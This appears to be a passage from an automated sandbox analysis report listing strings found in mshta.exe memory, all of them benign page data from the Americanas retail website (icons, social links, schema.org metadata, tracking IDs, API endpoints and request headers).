Source: mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4.4-5.3-5.8-8.9-1.1-2.7-2.3-6.8-2.7-14.4-.3-8.2-.4-10.6-.4-31.3 0-20.7.1-23.1.4-31.3.4-7.6 1.6-11.7 2
Source: mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4.4-5.3-5.8-8.9-1.1-2.7-2.3-6.8-2.7-14.4-.3-8.2-.4-10.6-.4-31.3 0-20.7.1-23.1.4-31.3.4-7.6 1.6-11.7 2
Source: mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trace-context":"9b16dc407a952ba79ed81ebe4c50f38c/8
Source: mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trace-context":"9b16dc407a952ba79ed81ebe4c50f38c/8
Source: mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trace-context":"9b16dc407a952ba79ed81ebe4c50f38c/8
Source: mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: K{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w3 equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: K{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w3 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: K{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w3 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Visited: user@https://www.youtube.com/CanalAmericanasU equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"